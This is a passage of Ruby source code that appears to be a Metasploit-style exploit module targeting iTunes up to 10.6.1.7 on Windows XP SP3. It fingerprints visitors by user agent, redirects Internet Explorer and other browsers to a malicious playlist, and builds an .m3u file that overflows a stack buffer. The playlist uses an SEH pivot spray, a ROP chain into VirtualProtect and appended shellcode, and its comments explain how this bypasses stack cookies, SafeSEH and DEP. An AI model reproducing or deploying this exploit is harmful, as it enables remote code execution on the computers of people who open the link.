if request.uri =~ /\.ico$/i
# Discard requests for ico files
send_not_found(cli)
#elsif agent =~ /iTunes\/10.6.1/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
elsif agent =~ /iTunes/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
# exploit iTunes (<= 10.6.1.7) on Windows XP SP3
send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
status(request,cli,"Sending playlist")
elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
# redirect MSIE to iTunes link
send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
status(request,cli,"Redirecting to playlist")
elsif agent =~ /NT 5\.1/
# redirect Firefox, Chrome, Opera, Safari to iTunes link
send_redirect(cli, m3u_location)
status(request,cli,"Redirecting to playlist")
else
send_not_found(cli)
print_status("Unknown User-Agent. Sending 404")
end
end
# IE does not follow an itms:// redirect delivered via the HTTP Location header...
# ... so the redirect is delivered as an HTML <meta http-equiv="refresh"> page instead
# Build an HTML page that bounces the client to m3u_location through a
# zero-second <meta http-equiv="refresh">, for browsers (IE) that do not
# honour an itms:// target sent in a Location header.
#
# @param m3u_location [String] URL of the playlist the client should fetch
# @return [String] complete HTML document, one element per line, every line
#   (including the last) terminated by "\n"
#
# NOTE(review): m3u_location is interpolated into the content attribute
# without escaping. That is acceptable if it is always operator-supplied
# (it appears to be built by the module, not taken from the client), but a
# '"' or '>' inside it would break out of the attribute -- confirm its origin.
def generate_redirect_ie(m3u_location)
  document = [
    '<!DOCTYPE HTML>',
    '<html>',
    '<head>',
    "<meta http-equiv=\"refresh\" content=\"0; URL=#{m3u_location}\">",
    '</head>',
    '</html>'
  ]
  # Mirror heredoc semantics: each line, including the closing tag, ends in "\n".
  document.map { |line| "#{line}\n" }.join
end
# create the malicious playlist
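# Build the malicious .m3u playlist that overflows the iTunes stack buffer.
#
# Layout: the '#EXTINF:,' header, then the stack-pivot gadget address
# repeated 0x6a times (the stack layout depends on what iTunes is doing --
# running or not, playing music, etc. -- so every candidate SEH handler slot
# is covered rather than one fixed offset), a ROP NOP sled the pivot lands
# in, the ROP chain from gimme_rop, the shellcode, and random alphanumeric
# padding out to 0x1000 bytes so the overflow reaches the SEH record.
#
# Mitigation bypasses (per the original analysis):
#   - stack cookies: an SEH exception is raised before the cookie is checked
#   - SafeSEH: gadgets come from a non-SafeSEH module (QuickTime.qts v7.7.2)
#   - DEP: ROP chain into VirtualProtect, then execute the shellcode
#
# @param payload [String] encoded shellcode appended after the ROP chain
# @return [String] playlist contents, at least 0x1000 bytes long
#
# NOTE(review): always uses targets[0]; if a second target is ever added,
# this should read the framework's selected target instead.
def generate_m3u(payload)
  target = targets[0]
  m3u = '#EXTINF:,'
  # spray the pivot over every slot that could hold the SEH handler
  m3u << [target['SEH']].pack("V") * 0x6a   # stack pivot/rewind (ADD ESP, ...)
  m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
  m3u << gimme_rop                          # VirtualProtect ROP chain
  m3u << payload
  # 0x1000 bytes should be enough to overflow the stack and trigger SEH.
  # Clamp the pad length at zero: if the ROP chain plus payload already
  # exceeds 0x1000 bytes the buffer still overflows, and we must not hand a
  # negative length to rand_text_alphanumeric.
  pad_len = [0x1000 - m3u.length, 0].max
  m3u << rand_text_alphanumeric(pad_len)
  m3u
end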